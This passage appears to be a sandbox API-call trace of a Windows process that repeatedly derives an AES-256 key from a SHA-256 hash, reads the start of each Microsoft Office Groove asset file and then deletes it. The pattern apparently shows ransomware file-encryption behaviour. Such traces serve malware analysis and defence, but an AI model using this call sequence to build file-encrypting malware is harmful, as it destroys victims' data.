(hProv=0xa52810, dwFlags=0x0) returned 1 [0168.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_groove.gif")) returned 1 [0168.254] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.255] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.255] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.255] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.255] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a6 [0168.255] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.262] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.262] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.262] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.263] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_lightspirit.gif")) returned 1 [0168.265] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.265] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.266] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.266] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.266] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d57 [0168.266] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.280] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.280] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.280] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_olivegreen.gif")) returned 1 [0168.284] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.285] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.285] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.285] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.285] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1845 [0168.285] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.289] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.289] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.289] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_premium.gif")) returned 1 [0168.293] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.294] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.294] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.294] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.294] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5141 [0168.294] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.299] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.299] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.299] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_slateblue.gif")) returned 1 [0168.303] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.304] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.304] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.304] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.304] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x193c [0168.304] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.308] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.308] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.308] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_texturedblue.gif")) returned 1 [0168.326] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.327] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.327] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.327] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.327] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c64 [0168.327] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.336] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.336] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.336] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_velvetrose.gif")) returned 1 [0168.349] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.350] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.350] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.350] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.350] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171 [0168.351] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.353] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.353] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.353] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_left.gif")) returned 1 [0168.357] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.358] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.358] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.358] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.358] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176 [0168.358] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.360] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.360] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.360] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_left_over.gif")) returned 1 [0168.364] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.365] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.365] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.365] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.365] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb5 [0168.365] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.367] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.367] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.367] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_mid.gif")) returned 1 [0168.371] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.371] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.371] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.371] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.372] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7 [0168.372] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.374] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.374] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.374] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_mid_over.gif")) returned 1 [0168.377] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.378] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.378] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.378] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.378] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171 [0168.378] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.380] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.380] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.380] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_right.gif")) returned 1 [0168.387] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.388] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.388] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.388] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.388] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x244 [0168.388] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.399] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.399] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.399] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_right_over.gif")) returned 1 [0168.402] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.402] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.402] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.402] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.402] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x45f [0168.402] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.413] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.413] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.413] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.414] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html")) returned 1 [0168.417] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.418] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.418] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.418] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.418] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x852 [0168.418] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.420] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.420] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.420] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.422] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsbrowserupgrade.html")) returned 1 [0168.423] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.423] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.423] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.423] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.423] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ef [0168.423] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.454] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.454] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.454] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formscolorchart.html")) returned 1 [0168.458] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.458] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.459] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.459] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.459] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x115a [0168.459] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.462] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.463] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.463] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsformtemplate.html")) returned 1 [0168.466] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.467] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.467] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.467] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.467] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd9c [0168.467] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.496] CryptDestroyHash (hHash=0x284d628) returned 1 [0168.496] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepage.html")) returned 1 [0168.499] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0168.500] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0168.500] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.500] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0168.500] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e87 [0168.500] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0168.504] CryptDestroyHash (hHash=0x284d728) returned 1 [0168.504] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0168.505] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0168.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagescript.js")) returned 1 [0168.509] CryptAcquireContextW (in: 